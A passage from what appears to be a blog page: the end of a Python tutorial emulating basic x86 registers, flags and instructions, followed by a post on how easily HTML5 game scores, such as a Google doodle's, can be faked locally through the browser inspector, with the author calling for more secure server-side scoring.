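        # Write a register; a 16- or 8-bit write leaves the other bits of the parent untouched
        parent, shift, width = ALIASES[reg]
        mask = ((1 << width) - 1) << shift
        self.regs[parent] = (self.regs[parent] & ~mask) | ((value << shift) & mask)

    def arith(self, op, a, b, width):
        # Apply op, truncate to width bits, and set ZF/CF the way the CPU does
        full = {"add": a + b, "sub": a - b, "and": a & b, "or": a | b, "xor": a ^ b}[op]
        res = full % (1 << width)
        self.flags["ZF"] = int(res == 0)
        self.flags["CF"] = int(full < 0 or full >= (1 << width))   # unsigned carry or borrow
        return res

    def run(self, program):
        # Execute Intel-syntax text: ';' starts a comment, a label sits alone on a line ending in ':'
        labels, code, pc = {}, [], 0
        for line in (l.split(";")[0].strip() for l in program.splitlines()):
            if line.endswith(":"):
                labels[line[:-1]] = len(code)
            elif line:
                code.append(line)
        while pc < len(code):
            mnem, _, rest = code[pc].partition(" ")
            ops = [o.strip() for o in rest.split(",")] if rest else []
            width = ALIASES[ops[0]][2] if ops and ops[0] in ALIASES else 32
            pc += 1
            if mnem == "mov":
                self.set(ops[0], self.get(ops[1]))
            elif mnem in ("add", "sub", "and", "or", "xor"):
                self.set(ops[0], self.arith(mnem, self.get(ops[0]), self.get(ops[1]), width))
            elif mnem == "cmp":                   # a SUB that keeps only the flags
                self.arith("sub", self.get(ops[0]), self.get(ops[1]), width)
            elif mnem in ("inc", "dec"):          # INC and DEC leave CF untouched
                cf = self.flags["CF"]
                self.set(ops[0], self.arith("add" if mnem == "inc" else "sub", self.get(ops[0]), 1, width))
                self.flags["CF"] = cf
            elif mnem == "push":
                self.stack.append(self.get(ops[0]))
            elif mnem == "pop":
                self.set(ops[0], self.stack.pop())
            elif mnem in ("jmp", "jz", "jnz"):
                if {"jmp": True, "jz": self.flags["ZF"], "jnz": not self.flags["ZF"]}[mnem]:
                    pc = labels[ops[0]]
            else:
                raise ValueError("unsupported instruction: " + code[pc - 1])
        return self

# Constructed sample program exercising the registers and instructions from the tutorial
SAMPLE = """
    mov eax, 0x12345678
    mov bx, ax          ; ebx = 0x00005678: bx is the low 16 bits of ebx
    mov bh, 0xAB        ; ebx = 0x0000AB78: only bits 9-16 of ebx change
    mov dl, ah          ; edx = 0x00000056: ah is bits 9-16 of eax
    push eax
    push ebx
    pop edi             ; LIFO: edi receives ebx, the value pushed last
    pop esi             ; esi receives eax
    mov ecx, 5
    xor eax, eax        ; the usual idiom for eax = 0 (also sets ZF)
sum_loop:
    add eax, ecx
    dec ecx
    cmp ecx, 0          ; ZF becomes 1 once ecx reaches 0
    jnz sum_loop        ; loop while ZF == 0: eax ends as 5+4+3+2+1 = 15
    mov edx, 0xFFFFFFFF
    add edx, 1          ; wraps around to 0 and sets CF = 1
"""

def run_sample():
    # Run SAMPLE on a fresh CPU and return it so the registers and flags can be inspected
    return CPU().run(SAMPLE)
```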

This much is enough for now. If you have any questions, or if you find something wrong, then do tell me.

HTML 5 and security


Gaming is not just a mere pastime; it's something much more than that.
Now people compete in gaming and there are prizes to be won; people spend money on gaming to keep their score higher than others', and there are even gamers so dedicated that they play almost 24x7.
Working as an HTML 5 game developer with Mintango technologies and a security guy by passion, I came up with this; it is something very common but still worth sharing.

I believe almost all of you know about Google's recent Olympic special doodles, and some of us are more interested in getting a good score, getting all those 3 medals, and then taking a snapshot and posting it on Facebook.

If you see a friend's good score, that doesn't really mean the person really scored that, because if you know a little bit of HTML it's very easy to fake your score. I am talking about manipulating the score, not Photoshop.

It's very simple: just right-click on the doodle and click Inspect Element (I did this in Google Chrome) and it takes you to the HTML code. Now simply search for the numbers which represent your score and change them to what you need them to be, e.g. change the value from 20 to 999, and this will look like:

Image before changing anything

And now the medals: change the class from class="hplogo_smh" to class="hplogo_smg"
and tada, you have one of the best scores.

Why am I telling this story?

Don't you think it's very easy? Indeed it is. But the question is, if this is that easy, then is it worth creating some serious kind of games using HTML 5?
I am not a (superhero :P) Flash guy, but I know that it is secure enough that we may create some serious kind of games with it, and companies like Zapak and some others are creating games which record the final score and then distribute prizes, which attracts gamers to log on to their site.

I am not saying that it has to be like a castle, but we need this to be secure, as anyone may easily manipulate the score or the content which we are sending to the server, which is used for the analysis of our score and comparison of players.

I must confess that I never tried this with some big game, as for that I need official permission from the server owner. If you have one then I would love to test it :)

I will come up with how to make things more secure and what changes we need to make serious gaming more serious.

Conclusion:

it's not that secure yet.

If you have any questions then you may mail me or comment here.